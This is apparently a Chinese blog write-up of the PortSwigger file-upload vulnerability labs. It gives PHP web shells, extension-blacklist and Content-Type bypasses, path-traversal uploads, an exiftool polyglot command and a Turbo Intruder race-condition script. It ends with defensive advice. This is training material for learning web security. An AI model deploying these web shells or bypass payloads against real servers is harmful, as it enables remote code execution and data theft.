文件上传(一):PortSwigger靶场通关笔记

h4ckb0ss
• 阅读 328

写在前面

该文章是作者在PortSwigger的文件上传漏洞靶场训练的过程记录以及学习笔记 使用的工具为BurpSuite Pro

漏洞简介

文件上传漏洞通常指应用对用户上传的文件没有完善的检验,允许攻击者通过Web应用程序上传恶意文件到服务器,然后通过这些恶意文件来进行执行任意代码,在客户端影响用户等攻击

lab1:通过上传web shell来远程执行命令

lab地址:Remote code execution via web shell upload

<?php echo file_get_contents('/home/carlos/secret'); ?>

该lab没有任何的防御措施,直接上传php脚本即可,访问拿到密钥通过 文件上传(一):PortSwigger靶场通关笔记 文件上传(一):PortSwigger靶场通关笔记

lab2:绕过Content-Type限制上传web shell

lab地址:Web shell upload via Content-Type restriction bypass 某些情景下,web应用可能通过请求中Content-Type字段判断上传文件的类型,这种时候我们可以上传脚本,抓包,修改Content-Type来绕过限制

该lab直接上传脚本会被拦截 文件上传(一):PortSwigger靶场通关笔记

修改Content-Type的值为image/jpeg,成功上传 文件上传(一):PortSwigger靶场通关笔记

文件上传(一):PortSwigger靶场通关笔记

lab3:通过路径遍历上传web shell

lab地址:Web shell upload via path traversal 某些情景下,web应用会对存放用户上传文件的文件夹做限制,可能不给执行文件的权限,这种情况下,可以尝试通过路径遍历的方式上传文件到其他文件夹

打开lab,尝试通过路径遍历上传文件,发现路径遍历序列(../)被过滤了 文件上传(一):PortSwigger靶场通关笔记

尝试对路径遍历序列进行url编码,发现上传成功 文件上传(一):PortSwigger靶场通关笔记

读取上传的文件,注意路径是上一级目录 文件上传(一):PortSwigger靶场通关笔记

lab4:绕过文件扩展名黑名单上传web shell

lab地址:Web shell upload via extension blacklist bypass 某些情景下,web应用对用户上传的文件的扩展名做了限制,但是使用的是黑名单机制,这种情况下,我们可以尝试用以下几种方式进行绕过

  • 使用不常见的后缀名:php5,pht,phpt,phtml,php3,php4,php5,php6
  • 使用大小写:.pHp
  • 重写服务器配置文件:apache的.htaccess或者IIS的web.config
  • 使用多扩展名,譬如example.php.jpg,这种方式依赖于服务器如何解析文件,如果服务器从前往后解析,并且解析到第一个扩展名就停止解析,则该文件会被当作example.php存储
  • 添加尾随字符,有些组件可能会过滤或忽视文件名末尾的空格或小数点,譬如example.php.example.php (末尾有一个空格)
  • 尝试使用url编码,譬如:example%2ephp
  • 再文件扩展名前添加分号或者url编码的空字符,譬如:example.php;jpgexample.php%00.jpg
  • 使用多字节Unicode字符,譬如Unicode字符序列:xC0 xAExC4 xAExC0 x2E再utf-8编码下可能转化为x2E,然后转化为ASCII字符使用

该lab使用的是apache的web容器,不解析php5后缀的文件,我们可以分两步走,第一次先上传.htaccess文件,文件内容如下

AddType application/x-httpd-php .php5

第二次再上传php5文件,然后访问拿到密钥字符串 文件上传(一):PortSwigger靶场通关笔记

文件上传(一):PortSwigger靶场通关笔记

文件上传(一):PortSwigger靶场通关笔记

lab5:通过混淆扩展名上传web shell

lab地址:Web shell upload via obfuscated file extension 该lab的目的还是对黑名单的绕过,使用多扩展名和空字符隔断来达成目的 文件上传(一):PortSwigger靶场通关笔记

文件上传(一):PortSwigger靶场通关笔记

lab6:通过上传多态web shell来远程执行命令

lab地址:Remote code execution via polyglot web shell upload 某些情景下,web应用会对上传文件的内容做校验,如果没有识别到预期的特征码,则会报错。譬如jepg文件以字节FF D8 FF开头,如果web应用没有在文件开头检测到FF D8 FF,则不予通过。这种情况下,可以通过exiftool或其他工具来修改文件元数据,插入脚本生成多态jpeg文件进行绕过 exiftool命令:

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php

文件上传(一):PortSwigger靶场通关笔记

文件上传(一):PortSwigger靶场通关笔记

lab7:通过条件竞争上传web shell

lab地址:Web shell upload via race condition 某些情景下,web应用会先将文件存放在文件夹, 然后对文件进行检验,如果检验不通过,则删除文件。 这种情况下,检验文件需要花费时间,可以尝试通过条件竞争(也就是并发请求)来访问上传的文件

通过该lab的过程使用了burpsuite的Turbo Intruder插件,可以从插件商店获取 思路如下:先上传脚本文件,然后并发请求脚本文件 将上传文件的post请求发送到Turbo Intruder中 文件上传(一):PortSwigger靶场通关笔记

运行脚本,得到的返回结果中有一个状态码200的响应 文件上传(一):PortSwigger靶场通关笔记

Turbo Intruder脚本如下: request1就是上传脚本的post请求,request2就是访问脚本的get请求

def queueRequests(target, wordlists):
    # 创建一个请求引擎实例,设置目标端点和并发连接数为10
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    # 定义第一个请求,发送一个包含PHP shell代码的POST请求
    request1 = '''POST /my-account/avatar HTTP/2
Host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
Cookie: session=YTriMl41vQC9ht9ZUUlTsG0N3Hvhyv1K
Content-Length: 474
Cache-Control: max-age=0
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5Enuwu47MKXZU1BO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i

------WebKitFormBoundary5Enuwu47MKXZU1BO
Content-Disposition: form-data; name="avatar"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo file_get_contents('/home/carlos/secret'); ?>
------WebKitFormBoundary5Enuwu47MKXZU1BO
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundary5Enuwu47MKXZU1BO
Content-Disposition: form-data; name="csrf"

ZrWXP2w3ZBEPRTeru2qZyfPvSMtAo8Vl
------WebKitFormBoundary5Enuwu47MKXZU1BO--
'''

    # 定义第二个请求,发送一个GET请求来访问上传的PHP shell文件
    request2 = '''GET /files/avatars/shell.php HTTP/2
Host: 0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net
Cookie: session=YTriMl41vQC9ht9ZUUlTsG0N3Hvhyv1K
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a8200ab04ec07fd87f9a81900cc0007.web-security-academy.net/my-account/avatar
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i

'''

    # 使用 'race1' 标签将第一个请求排队,并阻止该请求的最后一个字节直到调用 openGate
    engine.queue(request1, gate='race1')
    # 将第二个请求排队5次,使用相同的 'race1' 标签
    for x in range(5):
        engine.queue(request2, gate='race1')

    # 等待所有带有 'race1' 标签的请求准备就绪
    # 然后发送每个请求的最后一个字节
    # (此方法是非阻塞的,就像 queue 方法一样)
    engine.openGate('race1')

    # 完成所有请求,设置超时时间为60秒
    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

文件上传漏洞非RCE利用

Stored-XSS

上传包含JavaScript代码或内联JavaScript的脚本文件,如果在其它页面被用户访问,就可以造成XSS漏洞

XXE

如果系统正确,安全的对上传文件进行处理和存储,可以尝试在解析文件过程中测试漏洞,例如解析Microsoft Office的docx文件,xls文件等类型的文件,可能会有xxe漏洞的风险

如何防止文件上传

防止文件上传漏洞的产生需要一套组合拳,组合如下:

  1. 限制上传文件的后缀,推荐采用白名单而非黑名单机制,黑名单机制非常容易出现不全面的情况,导致被绕过
  2. 确保上传文件的文件名没有包含可能被当作目录或目录遍历序列(../)的字符串
  3. 重命名上传文件,避免已存在文件被重写(主要是避免配置文件被重写)
  4. 在彻底检验通过前不要将文件上传到服务器的文件系统
  5. 如果可能,最好使用稳定,成熟的框架来处理文件上传,而不是使用自己写的校验机制
点赞
收藏
评论区
推荐文章
Easter79 Easter79
3年前
Vue (ElementUI)在前端浏览器读取文本文件(如JSON)内容
有时想要导入数据到数据库,需要上传相应的文本文件,而这种文件基本上是一次消耗品,也就是上传到后端服务读取了数据之后需要将上传的该文件进行删除。vue文件template中的代码:<eluploadaction"":onchange"readFile"
happlyfox happlyfox
3年前
.net web core 如何编码实现文件上传功能
关于我前言在进行Web前后端分析开始时,我们经常会碰到文件上传的需求。上传用户头像,上传认证材料、审核材料等,这些都可以归类为文件上传功能。今天主要把自己在开发过程中的心得进行一个整理,供大家学习。开启静态文件中间件默认情况下,静态文件(如HTML、CSS、图像和JavaScript)是ASP.NETCore应用直接提供给客户端的资产。开启静态
李志宽 李志宽
1年前
【小白必学】文件上传的漏洞介绍及常见防御方法
01文件上传漏洞原理在文件上传的功能处,若服务端脚本语言未对上传的文件进行严格验证和过滤,导致恶意用户上传恶意的脚本文件时,就有可能获取执行服务端命令的能力,这就是文件上传漏洞。02文件上传漏洞触发点相册、头像上传、视频、照片分享、附件上传(论坛发帖、邮箱
lix_uan lix_uan
2年前
Hadoop学习总结
HDFS相关HDFS写数据的流程首先由客户端向NameNode服务发起写数据请求NameNode收到请求后会进行基本验证验证类容包括对请求上传的路径进行合法验证对请求的用户进行权限验证验证没有问题后,NameNode会响应客户端允许上传接下来客户端会对文件按照blocksize大小进行切块,切完后依次以块为单位上传此时客户端会请求上传
Stella981 Stella981
3年前
Django自身安全机制
XSS攻击什么是XSS攻击XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(https://www.oschina.net/action/GoT
Stella981 Stella981
3年前
FastDFS
1.FastDFS是什么?FastDFS是分布式文件系统。使用FastDFS很容易搭建一套高性能的文件服务器集群提供文件上传、下载等服务。2.工作原理FastDFS架构包括Trackerserver和Storageserver。客户端请求Trackerserver进行文件上传、下载,通过Trackerser
可莉 可莉
3年前
20+ 个很棒的 jQuery 文件上传插件或教程
文件上传是网站很常见的功能之一,通过使用jQuery可以让上传过程更加人性化,更好的用户体验。本文介绍20个jQuery的文件上传插件,其中有一些是教程。1\.Plupload(http://www.oschina.net/p/plupload"Plupload")Plupload是一个Web浏览器上的界面友好的文件上传模块,可
Wesley13 Wesley13
3年前
信息安全
ylbtech信息安全攻击XSS:XSS/CSS攻击XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、VBScript、ActiveX、Flash或者甚至是普通的HTML。攻击成功后
Wesley13 Wesley13
3年前
PHP代码审计笔记
0x01最简单的文件上传未进行文件类型和格式做合法性校验,任意文件上传漏洞代码示例:新建一个提供上传文件的 upload.html<html创建上传脚本  upload\_file.php<?php漏洞利用:可上传任意文件!(https://oscimg.oschina.net/oscnet/a
Stella981 Stella981
3年前
Spring Boot 2.x基础教程:实现文件上传
文件上传的功能实现是我们做Web应用时候最为常见的应用场景,比如:实现头像的上传,Excel文件数据的导入等功能,都需要我们先实现文件的上传,然后再做图片的裁剪,excel数据的解析入库等后续操作。今天通过这篇文章,我们就来一起学习一下如何在SpringBoot中实现文件的上传。动手试试第一步:创建一个基础的SpringBo
h4ckb0ss
h4ckb0ss
Lv1
若为化得身千亿,散上峰头望故乡。
文章
4
粉丝
0
获赞
0